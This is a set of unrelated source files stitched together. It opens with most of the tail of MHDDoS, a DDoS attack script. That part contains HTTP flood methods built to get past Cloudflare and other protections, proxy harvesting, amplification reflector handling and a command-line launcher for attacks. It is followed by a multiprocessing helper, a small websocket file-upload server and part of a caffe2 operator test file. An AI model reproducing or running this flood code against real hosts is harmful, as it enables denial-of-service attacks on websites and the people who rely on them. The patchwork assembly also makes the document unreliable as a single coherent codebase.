with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOT(self) -> None:
payload: bytes = self.generate_payload()
p1, p2 = str.encode(
"GET /robots.txt HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: text/plain,text/html,*/*\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n\r\n"), str.encode(
"GET /sitemap.xml HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: */*\r\n"
"From: googlebot(at)googlebot.com\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n"
"If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9),
ProxyTools.Random.rand_str(4)) +
"If-Modified-Since: Sun, 26 Set 2099 06:00:00 GMT\r\n\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, p1)
Tools.send(s, p2)
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def EVEN(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
while Tools.send(s, payload) and s.recv(1):
continue
Tools.safe_close(s)
def OVH(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(min(self._rpc, 5)):
Tools.send(s, payload)
Tools.safe_close(s)
def CFB(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), create_scraper() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def CFBUAM(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, payload)
sleep(5.01)
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def AVB(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
sleep(max(self._rpc / 1000, 1))
Tools.send(s, payload)
Tools.safe_close(s)
def DGB(self):
global REQUESTS_SENT, BYTES_SEND
s = None
with suppress(Exception), create_scraper() as s:
for _ in range(min(self._rpc, 5)):
sleep(min(self._rpc, 5) / 100)
if self._proxies:
pro = randchoice(self._proxies)
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def DYN(self):
payload: str | bytes = str.encode(self._payload +
"Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority) +
self.randHeadercontent +
"\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def DOWNLOADER(self):
payload: str | bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while 1:
sleep(.01)
data = s.recv(1)
if not data:
break
Tools.send(s, b'0')
Tools.safe_close(s)
def BYPASS(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), Session() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def GSB(self):
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
self._target.raw_path_qs,
ProxyTools.Random.rand_str(6)) +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n\r\n')
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def NULL(self) -> None:
payload: str | bytes = str.encode(self._payload +
"Host: %s\r\n" % self._target.authority +
"User-Agent: null\r\n" +
"Referrer: null\r\n" +
self.SpoofIP + "\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOMB(self):
pro = randchoice(self._proxies)
run([
f'{Path.home() / "go/bin/bombardier"}',
f'{bombardier_path}',
f'--connections={self._rpc}',
'--http2',
'--method=GET',
'--no-print',
'--timeout=60s',
f'--requests={self._rpc}',
f'--proxy={pro}',
f'{self._target.human_repr()}',
])
def SLOW(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while Tools.send(s, payload) and s.recv(1):
for i in range(self._rpc):
keep = str.encode("X-a: %d\r\n" % randint(1, 5000))
Tools.send(s, keep)
sleep(self._rpc / 15)
break
Tools.safe_close(s)
def select(self, name: str) -> None:
self.SENT_FLOOD = self.GET
if name == "POST":
self.SENT_FLOOD = self.POST
if name == "CFB":
self.SENT_FLOOD = self.CFB
if name == "CFBUAM":
self.SENT_FLOOD = self.CFBUAM
if name == "XMLRPC":
self.SENT_FLOOD = self.XMLRPC
if name == "BOT":
self.SENT_FLOOD = self.BOT
if name == "APACHE":
self.SENT_FLOOD = self.APACHE
if name == "BYPASS":
self.SENT_FLOOD = self.BYPASS
if name == "OVH":
self.SENT_FLOOD = self.OVH
if name == "AVB":
self.SENT_FLOOD = self.AVB
if name == "STRESS":
self.SENT_FLOOD = self.STRESS
if name == "DYN":
self.SENT_FLOOD = self.DYN
if name == "SLOW":
self.SENT_FLOOD = self.SLOW
if name == "GSB":
self.SENT_FLOOD = self.GSB
if name == "NULL":
self.SENT_FLOOD = self.NULL
if name == "COOKIE":
self.SENT_FLOOD = self.COOKIES
if name == "PPS":
self.SENT_FLOOD = self.PPS
self._defaultpayload = (
self._defaultpayload +
"Host: %s\r\n\r\n" % self._target.authority).encode()
if name == "EVEN": self.SENT_FLOOD = self.EVEN
if name == "DOWNLOADER": self.SENT_FLOOD = self.DOWNLOADER
if name == "BOMB": self.SENT_FLOOD = self.BOMB
class ProxyManager:
@staticmethod
def DownloadFromConfig(cf, Proxy_type: int) -> Set[Proxy]:
providrs = [
provider for provider in cf["proxy-providers"]
if provider["type"] == Proxy_type or Proxy_type == 0
]
logger.info("Downloading Proxies form %d Providers" % len(providrs))
proxes: Set[Proxy] = set()
with ThreadPoolExecutor(len(providrs)) as executor:
future_to_download = {
executor.submit(
ProxyManager.download, provider,
ProxyType.stringToProxyType(str(provider["type"])))
for provider in providrs
}
for future in as_completed(future_to_download):
for pro in future.result():
proxes.add(pro)
return proxes
@staticmethod
def download(provider, proxy_type: ProxyType) -> Set[Proxy]:
logger.debug(
"Downloading Proxies form (URL: %s, Type: %s, Timeout: %d)" %
(provider["url"], proxy_type.name, provider["timeout"]))
proxes: Set[Proxy] = set()
with suppress(TimeoutError, exceptions.ConnectionError,
exceptions.ReadTimeout):
data = get(provider["url"], timeout=provider["timeout"]).text
try:
for proxy in ProxyUtiles.parseAllIPPort(
data.splitlines(), proxy_type):
proxes.add(proxy)
except Exception as e:
logger.error('Download Proxy Error: %s' %
(e.__str__() or e.__repr__()))
return proxes
class ToolsConsole:
METHODS = {"INFO", "TSSRV", "CFIP", "DNS", "PING", "CHECK", "DSTAT"}
@staticmethod
def checkRawSocket():
with suppress(OSError):
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP):
return True
return False
@staticmethod
def runConsole():
cons = "%s@BetterStresser:~#" % gethostname()
while 1:
cmd = input(cons + " ").strip()
if not cmd: continue
if " " in cmd:
cmd, args = cmd.split(" ", 1)
cmd = cmd.upper()
if cmd == "HELP":
print("Tools:" + ", ".join(ToolsConsole.METHODS))
print("Commands: HELP, CLEAR, BACK, EXIT")
continue
if (cmd == "E") or \
(cmd == "EXIT") or \
(cmd == "Q") or \
(cmd == "QUIT") or \
(cmd == "LOGOUT") or \
(cmd == "CLOSE"):
exit(-1)
if cmd == "CLEAR":
print("\033c")
continue
if not {cmd} & ToolsConsole.METHODS:
print("%s command not found" % cmd)
continue
if cmd == "DSTAT":
with suppress(KeyboardInterrupt):
ld = net_io_counters(pernic=False)
while True:
sleep(1)
od = ld
ld = net_io_counters(pernic=False)
t = [(last - now) for now, last in zip(od, ld)]
logger.info(
("Bytes Sended %s\n"
"Bytes Recived %s\n"
"Packets Sended %s\n"
"Packets Recived %s\n"
"ErrIn %s\n"
"ErrOut %s\n"
"DropIn %s\n"
"DropOut %s\n"
"Cpu Usage %s\n"
"Memory %s\n") %
(Tools.humanbytes(t[0]), Tools.humanbytes(t[1]),
Tools.humanformat(t[2]), Tools.humanformat(t[3]),
t[4], t[5], t[6], t[7], str(cpu_percent()) + "%",
str(virtual_memory().percent) + "%"))
if cmd in ["CFIP", "DNS"]:
print("Soon")
continue
if cmd == "CHECK":
while True:
with suppress(Exception):
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
if "/" not in domain: continue
logger.info("please wait ...")
with get(domain, timeout=20) as r:
logger.info(('status_code: %d\n'
'status: %s') %
(r.status_code, "ONLINE"
if r.status_code <= 500 else "OFFLINE"))
if cmd == "INFO":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.info(domain)
if not info["success"]:
print("Error!")
continue
logger.info(("Country: %s\n"
"City: %s\n"
"Org: %s\n"
"Isp: %s\n"
"Region: %s\n") %
(info["country"], info["city"], info["org"],
info["isp"], info["region"]))
if cmd == "TSSRV":
while True:
domain = input(f'{cons}give-me-domain# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.ts_srv(domain)
logger.info("TCP: %s\n" % (info['_tsdns._tcp.']))
logger.info("UDP: %s\n" % (info['_ts3._udp.']))
if cmd == "PING":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
logger.info("please wait ...")
r = ping(domain, count=5, interval=0.2)
logger.info(('Address: %s\n'
'Ping: %d\n'
'Aceepted Packets: %d/%d\n'
'status: %s\n') %
(r.address, r.avg_rtt, r.packets_received,
r.packets_sent,
"ONLINE" if r.is_alive else "OFFLINE"))
@staticmethod
def stop():
print('All Attacks has been Stopped !')
for proc in process_iter():
if proc.name() == "python.exe":
proc.kill()
@staticmethod
def usage():
print((
'* MHDDoS - DDoS Attack Script With %d Methods\n'
'Note: If the Proxy list is empty, the attack will run without proxies\n'
' If the Proxy file doesn\'t exist, the script will download proxies and check them.\n'
' Proxy Type 0 = All in config.json\n'
' SocksTypes:\n'
' - 6 = RANDOM\n'
' - 5 = SOCKS5\n'
' - 4 = SOCKS4\n'
' - 1 = HTTP\n'
' - 0 = ALL\n'
' > Methods:\n'
' - Layer4\n'
' | %s | %d Methods\n'
' - Layer7\n'
' | %s | %d Methods\n'
' - Tools\n'
' | %s | %d Methods\n'
' - Others\n'
' | %s | %d Methods\n'
' - All %d Methods\n'
'\n'
'Example:\n'
' L7: python3 %s <method> <url> <socks_type> <threads> <proxylist> <rpc> <duration> <debug=optional>\n'
' L4: python3 %s <method> <ip:port> <threads> <duration>\n'
' L4 Proxied: python3 %s <method> <ip:port> <threads> <duration> <socks_type> <proxylist>\n'
' L4 Amplification: python3 %s <method> <ip:port> <threads> <duration> <reflector file (only use with'
' Amplification)>\n') %
(len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
", ".join(Methods.LAYER4_METHODS), len(Methods.LAYER4_METHODS),
", ".join(Methods.LAYER7_METHODS), len(Methods.LAYER7_METHODS),
", ".join(ToolsConsole.METHODS), len(ToolsConsole.METHODS),
", ".join(["TOOLS", "HELP", "STOP"]), 3,
len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
argv[0], argv[0], argv[0], argv[0]))
# noinspection PyBroadException
@staticmethod
def ts_srv(domain):
records = ['_ts3._udp.', '_tsdns._tcp.']
DnsResolver = resolver.Resolver()
DnsResolver.timeout = 1
DnsResolver.lifetime = 1
Info = {}
for rec in records:
try:
srv_records = resolver.resolve(rec + domain, 'SRV')
for srv in srv_records:
Info[rec] = str(srv.target).rstrip('.') + ':' + str(
srv.port)
except:
Info[rec] = 'Not found'
return Info
# noinspection PyUnreachableCode
@staticmethod
def info(domain):
with suppress(Exception), get("https://ipwhois.app/json/%s/" % domain) as s:
return s.json()
return {"success": False}
def handleProxyList(con, proxy_li, proxy_ty, url=None):
if proxy_ty not in {4, 5, 1, 0, 6}:
exit("Socks Type Not Found [4, 5, 1, 0, 6]")
if proxy_ty == 6:
proxy_ty = randchoice([4, 5, 1])
if not proxy_li.exists():
logger.warning("The file doesn't exist, creating files and downloading proxies.")
proxy_li.parent.mkdir(parents=True, exist_ok=True)
with proxy_li.open("w") as wr:
Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con, proxy_ty)
logger.info(
f"{len(Proxies):,} Proxies are getting checked, this may take awhile!"
)
Proxies = ProxyChecker.checkAll(
Proxies, timeout=1, threads=threads,
url=url.human_repr() if url else "http://httpbin.org/get",
)
if not Proxies:
exit(
"Proxy Check failed, Your network may be the problem"
" | The target may not be available."
)
stringBuilder = ""
for proxy in Proxies:
stringBuilder += (proxy.__str__() + "\n")
wr.write(stringBuilder)
proxies = ProxyUtiles.readFromFile(proxy_li)
if proxies:
logger.info(f"Proxy Count: {len(proxies):,}")
else:
logger.info(
"Empty Proxy File, running flood witout proxy")
proxies = None
return proxies
if __name__ == '__main__':
with open(__dir__ / "config.json") as f:
con = load(f)
with suppress(KeyboardInterrupt):
with suppress(IndexError):
one = argv[1].upper()
if one == "HELP":
raise IndexError()
if one == "TOOLS":
ToolsConsole.runConsole()
if one == "STOP":
ToolsConsole.stop()
method = one
host = None
url = None
event = Event()
event.clear()
target = None
urlraw = argv[2].strip()
if not urlraw.startswith("http"):
urlraw = "http://" + urlraw
if method not in Methods.ALL_METHODS:
exit("Method Not Found %s" %
", ".join(Methods.ALL_METHODS))
if method in Methods.LAYER7_METHODS:
url = URL(urlraw)
host = url.host
try:
host = gethostbyname(url.host)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
threads = int(argv[4])
rpc = int(argv[6])
timer = int(argv[7])
proxy_ty = int(argv[3].strip())
proxy_li = Path(__dir__ / "files/proxies/" /
argv[5].strip())
useragent_li = Path(__dir__ / "files/useragent.txt")
referers_li = Path(__dir__ / "files/referers.txt")
bombardier_path = Path(__dir__ / "go/bin/bombardier")
proxies: Any = set()
if method == "BOMB":
assert (
bombardier_path.exists()
or bombardier_path.with_suffix('.exe').exists()
), (
"Install bombardier: "
"https://github.com/MHProDev/MHDDoS/wiki/BOMB-method"
)
if len(argv) == 9:
logger.setLevel("DEBUG")
if not useragent_li.exists():
exit("The Useragent file doesn't exist ")
if not referers_li.exists():
exit("The Referer file doesn't exist ")
uagents = set(a.strip()
for a in useragent_li.open("r+").readlines())
referers = set(a.strip()
for a in referers_li.open("r+").readlines())
if not uagents: exit("Empty Useragent File ")
if not referers: exit("Empty Referer File ")
if threads > 1000:
logger.warning("Thread is higher than 1000")
if rpc > 100:
logger.warning(
"RPC (Request Pre Connection) is higher than 100")
proxies = handleProxyList(con, proxy_li, proxy_ty, url)
for _ in range(threads):
HttpFlood(url, host, method, rpc, event, uagents,
referers, proxies).start()
if method in Methods.LAYER4_METHODS:
target = URL(urlraw)
port = target.port
target = target.host
try:
target = gethostbyname(target)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
if port > 65535 or port < 1:
exit("Invalid Port [Min: 1 / Max: 65535] ")
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD", "SYN"} and \
not ToolsConsole.checkRawSocket():
exit("Cannot Create Raw Socket")
threads = int(argv[3])
timer = int(argv[4])
proxies = None
ref = None
if not port:
logger.warning("Port Not Selected, Set To Default: 80")
port = 80
if len(argv) >= 6:
argfive = argv[5].strip()
if argfive:
refl_li = Path(__dir__ / "files" / argfive)
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD"}:
if not refl_li.exists():
exit("The reflector file doesn't exist")
if len(argv) == 7:
logger.setLevel("DEBUG")
ref = set(a.strip()
for a in ProxyTools.Patterns.IP.findall(
refl_li.open("r+").read()))
if not ref: exit("Empty Reflector File ")
elif argfive.isdigit() and len(argv) >= 7:
if len(argv) == 8:
logger.setLevel("DEBUG")
proxy_ty = int(argfive)
proxy_li = Path(__dir__ / "files/proxies" / argv[6].strip())
proxies = handleProxyList(con, proxy_li, proxy_ty)
if method not in {"MINECRAFT", "MCBOT", "TCP", "CPS", "CONNECTION"}:
exit("this method cannot use for layer4 proxy")
else:
logger.setLevel("DEBUG")
for _ in range(threads):
Layer4((target, port), ref, method, event,
proxies).start()
logger.info(
"Attack Started to %s with %s method for %s seconds, threads: %d!"
% (target or url.human_repr(), method, timer, threads))
event.set()
ts = time()
while time() < ts + timer:
logger.debug('PPS: %s, BPS: %s / %d%%' %
(Tools.humanformat(int(REQUESTS_SENT)),
Tools.humanbytes(int(BYTES_SEND)),
round((time() - ts) / timer * 100, 2)))
REQUESTS_SENT.set(0)
BYTES_SEND.set(0)
sleep(1)
event.clear()
exit()
ToolsConsole.usage()
|
actor_runner.py
|
"""Helper class to run an actor on child process."""
import logging
import multiprocessing as mp
from functools import partial
from queue import Queue
from typing import Callable
class ActorRunner:
"""Actor runner. To start actors' sampling task you need to not only init Runner object but also call `start()` to kick gRPC client initialization and start the main task.
Args:
n_processes: Number of child processes.
run_actor_func: Function to init an actor.
"""
def __init__(self,
n_processes: int,
run_actor_func: Callable[[int, Queue], None],
logger: logging.Logger = logging.getLogger(__name__)):
self.n_processes = n_processes
self.logger = logger
# init actor subprocesses
self.ps = []
self.start_queue = []
for i in range(n_processes):
queue = mp.Queue(maxsize=1)
p = mp.Process(target=partial(run_actor_func, process_index=i, start_queue=queue), daemon=True)
p.start()
self.ps.append(p)
self.start_queue.append(queue)
@property
def workers_alive(self) -> bool:
"""Returns actor worker processes are alive or not."""
return self.n_processes == 0 or all([p.is_alive() for p in self.ps])
def start(self) -> None:
"""Run child process tasks."""
if self.n_processes > 0:
[q.put(True) for q in self.start_queue]
def finalize(self) -> None:
"""Finalize processes."""
[p.terminate() for p in self.ps]
[p.join() for p in self.ps]
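# A minimal usage sketch (illustrative only; `my_actor_loop` is a hypothetical
# run_actor_func supplied by the caller and is not part of this module):
#
#   def my_actor_loop(process_index: int, start_queue: mp.Queue) -> None:
#       start_queue.get()   # block until start() signals this process to begin
#       ...                 # actor sampling loop goes here
#
#   runner = ActorRunner(n_processes=2, run_actor_func=my_actor_loop)
#   runner.start()      # unblock the child processes
#   ...
#   runner.finalize()   # terminate and join the children when done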
|
server.py
|
import websockets
import asyncio
import traceback
import jsonpickle
import json
import inspect
from . import utils
from http.server import HTTPServer, SimpleHTTPRequestHandler
import threading
import os
import io
import cgi
from .manager import *
class ReqHandler(SimpleHTTPRequestHandler):
def log_message(self, format, *args):
return
def translate_path(self, path):
return utils.translate_path(path)
def end_headers (self):
self.send_header('Access-Control-Allow-Origin', '*')
SimpleHTTPRequestHandler.end_headers(self)
def do_POST(self):
r, info = self.deal_post_data()
print(r, info, "by: ", self.client_address)
f = io.BytesIO()
if r:
f.write(b"Success\n")
else:
f.write(b"Failed\n")
length = f.tell()
f.seek(0)
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header("Content-Length", str(length))
self.end_headers()
if f:
self.copyfile(f, self.wfile)
f.close()
def deal_post_data(self):
ctype, _ = cgi.parse_header(self.headers['Content-Type'])
if ctype == 'multipart/form-data':
form = cgi.FieldStorage( fp=self.rfile, headers=self.headers, environ =
{'REQUEST_METHOD':'POST', 'CONTENT_TYPE':self.headers['Content-Type'],})
try:
fs = form.list[0]
fn = upload_path(fs.filename)
open(fn, "wb").write(fs.file.read())
except IOError:
return (False, "Can't create file to write, do you have permission to write?")
return (True, "Files uploaded")
return (False, 'Invalid header type!')
def start_server(path, port=8000):
'''Start a resource webserver serving path on port'''
httpd = HTTPServer(('', port), ReqHandler)
httpd.serve_forever()
def start(appname, port = 8000, user_type = User, user_dir = '',pretty_print = False,
socket_port = 1234, upload_dir = 'upload', translate_path = None):
set_utils(appname,user_dir,port,upload_dir, translate_path)
pretty_print = pretty_print
daemon = threading.Thread(name='daemon_server', target=start_server, args=('.', port))
daemon.daemon = True
daemon.start()
indent = 4 if pretty_print else None
def jsonString(obj):
return json.dumps(json.loads(jsonpickle.encode(obj,unpicklable=False)),
indent = indent, sort_keys = pretty_print)
async def session(websocket, path):
address = websocket.remote_address
try:
if address in users:
user = users[address]
else:
user = user_type()
user.load()
users[address] = user
await websocket.send(jsonString([user.menu,user.screen]))
async for message in websocket:
if address in users:
user = users[address]
else:
print('Unknown user search error!')
return
data = json.loads(message)
result = user.result4message(data)
if result:
await websocket.send(jsonString(user.prepare_result(result)))
except Exception as e:
if getattr(e,'code',0) != 1006: #client interruption
print(e,traceback.format_exc())
finally:
if address in users:
del users[address]
print(f'Starting {appname} server on port {port}...')
asyncio.get_event_loop().run_until_complete(
websockets.serve(session, '0.0.0.0', socket_port))
asyncio.get_event_loop().run_forever()
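# A minimal usage sketch (illustrative only; `MyUser` is a hypothetical subclass of
# the `User` type imported from .manager and is not defined in this module):
#
#   class MyUser(User):
#       ...  # implement load(), result4message(), etc.
#
#   start('demo_app', port=8000, socket_port=1234, user_type=MyUser)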
|
hypothesis_test.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import copy
import time
from functools import partial, reduce
from future.utils import viewitems, viewkeys
from hypothesis import assume, given, settings
import hypothesis.strategies as st
import unittest
from caffe2.python import core, workspace, tt_core, dyndep
import caffe2.python.hypothesis_test_util as hu
from caffe2.proto.caffe2_pb2 import TensorProto
dyndep.InitOpsLibrary('@/caffe2/caffe2/fb/optimizers:sgd_simd_ops')
def sigmoid(x):
return 1.0 / (1.0 + np.exp(-x))
@st.composite
def _tensor_and_prefix(draw, dtype, elements, min_dim=1, max_dim=4, **kwargs):
dims_ = draw(
st.lists(hu.dims(**kwargs), min_size=min_dim, max_size=max_dim))
extra_ = draw(
st.lists(hu.dims(**kwargs), min_size=min_dim, max_size=max_dim))
assume(len(dims_) + len(extra_) < max_dim)
return (draw(hu.arrays(dims_ + extra_, dtype, elements)),
draw(hu.arrays(extra_, dtype, elements)))
def _tensor_and_indices(min_dim=1, max_dim=4, dtype=np.float32,
elements=None, **kwargs):
""" generates a tensor and a list of indices of larger tensor of same dim"""
data_dims_ = st.lists(hu.dims(**kwargs), min_size=min_dim, max_size=max_dim)
original_dim = st.integers(min_value=2, max_value=10)
return st.tuples(data_dims_, original_dim).flatmap(lambda pair: st.tuples(
st.just(pair[1]), # original dimension
hu.arrays(pair[0], dtype, elements), # data tensor
hu.arrays(pair[0][0], dtype=np.int64, elements=st.integers(
min_value=0, max_value=pair[1] - 1)),
))
_NUMPY_TYPE_TO_ENUM = {
np.float32: core.DataType.FLOAT,
np.int32: core.DataType.INT32,
np.bool: core.DataType.BOOL,
np.uint8: core.DataType.UINT8,
np.int8: core.DataType.INT8,
np.uint16: core.DataType.UINT16,
np.int16: core.DataType.INT16,
np.int64: core.DataType.INT64,
np.float64: core.DataType.DOUBLE,
}
def _dtypes(dtypes=None):
dtypes = dtypes if dtypes else [np.int32, np.int64, np.float32]
return st.sampled_from(dtypes)
def _test_binary(name, ref, filter_=None, gcs=hu.gcs,
test_gradient=False, allow_inplace=False, dtypes=_dtypes):
@given(
inputs=dtypes().flatmap(
lambda dtype: hu.tensors(
n=2, dtype=dtype,
elements=hu.elements_of_type(dtype, filter_=filter_))),
out=st.sampled_from(('Y', 'X1', 'X2') if allow_inplace else ('Y',)),
**gcs)
@settings(max_examples=3, timeout=100)
def test_binary(self, inputs, out, gc, dc):
op = core.CreateOperator(name, ["X1", "X2"], [out])
X1, X2 = inputs
self.assertDeviceChecks(dc, op, [X1, X2], [0])
# We only do gradient check with float32 types.
if test_gradient and X1.dtype == np.float32:
self.assertGradientChecks(gc, op, [X1, X2], 0, [0])
self.assertReferenceChecks(gc, op, [X1, X2], ref)
return test_binary
def _test_binary_broadcast(name, ref, filter_=None,
gcs=hu.gcs, allow_inplace=False, dtypes=_dtypes):
@given(
inputs=dtypes().flatmap(lambda dtype: _tensor_and_prefix(
dtype=dtype,
elements=hu.elements_of_type(dtype, filter_=filter_))),
in_place=(st.booleans() if allow_inplace else st.just(False)),
**gcs)
@settings(max_examples=3, timeout=100)
def test_binary_broadcast(self, inputs, in_place, gc, dc):
op = core.CreateOperator(
name, ["X1", "X2"], ["X1" if in_place else "Y"], broadcast=1)
X1, X2 = inputs
self.assertDeviceChecks(dc, op, [X1, X2], [0])
def cast_ref(x, y):
return (np.array(ref(x, y)[0], dtype=x.dtype), )
# gradient not implemented yet
# self.assertGradientChecks(gc, op, [X1, X2], 0, [0])
self.assertReferenceChecks(gc, op, [X1, X2], cast_ref)
return test_binary_broadcast
class TestOperators(hu.HypothesisTestCase):
def test_comparison_ops(self):
ops = {"LT": lambda x1, x2: [x1 < x2],
"LE": lambda x1, x2: [x1 <= x2],
"GT": lambda x1, x2: [x1 > x2],
"GE": lambda x1, x2: [x1 >= x2]}
for name, ref in viewitems(ops):
_test_binary(name, ref, gcs=hu.gcs_cpu_only)(self)
_test_binary_broadcast(name, ref, gcs=hu.gcs_cpu_only)(self)
@given(inputs=hu.tensors(n=2), in_place=st.booleans(), **hu.gcs)
def test_sum(self, inputs, in_place, gc, dc):
op = core.CreateOperator("Sum", ["X1", "X2"],
["Y" if not in_place else "X1"])
X1, X2 = inputs
self.assertDeviceChecks(dc, op, [X1, X2], [0])
self.assertGradientChecks(gc, op, [X1, X2], 0, [0])
@given(inputs=hu.tensors(n=2, min_dim=2, max_dim=2), **hu.gcs_cpu_only)
def test_row_mul(self, inputs, gc, dc):
op = core.CreateOperator("RowMul", ["X1", "X2"], ["Y"])
X1, Xtmp = inputs
X2 = Xtmp[:, 0]
def ref(x, y):
ret = np.zeros(shape=x.shape, dtype=x.dtype)
for i in range(y.size):
ret[i, ] = x[i, ] * y[i]
return [ret]
self.assertDeviceChecks(dc, op, [X1, X2], [0])
for i in range(2):
self.assertGradientChecks(gc, op, [X1, X2], i, [0])
self.assertReferenceChecks(gc, op, [X1, X2], ref)
@given(inputs=hu.tensors(n=2), **hu.gcs_cpu_only)
def test_max(self, inputs, gc, dc):
op = core.CreateOperator("Max", ["X1", "X2"], ["Y"])
X1, X2 = inputs
# Make X1 and X2 far from each other, since X1=X2 is not differentiable
# and the step size of gradient checker is 0.05
X1[np.logical_and(X1 >= X2 - 0.05, X1 <= X2)] -= 0.05
X1[np.logical_and(X1 <= X2 + 0.05, X1 >= X2)] += 0.05
self.assertDeviceChecks(dc, op, [X1, X2], [0])
for i in range(2):
self.assertGradientChecks(gc, op, [X1, X2], i, [0])
def elementwise_max(X, Y):
return [np.maximum(X, Y)]
self.assertReferenceChecks(gc, op, [X1, X2], elementwise_max)
def test_add(self):
def ref(x, y):
return (x + y, )
_test_binary("Add", ref, test_gradient=True)(self)
_test_binary_broadcast("Add", ref)(self)
def test_sub(self):
def ref(x, y):
return (x - y, )
# TODO(jiayq): enable gradient test when implemented.
_test_binary("Sub", ref, test_gradient=True)(self)
_test_binary_broadcast("Sub", ref)(self)
def test_mul(self):
def ref(x, y):
return (x * y, )
_test_binary("Mul", ref, test_gradient=True)(self)
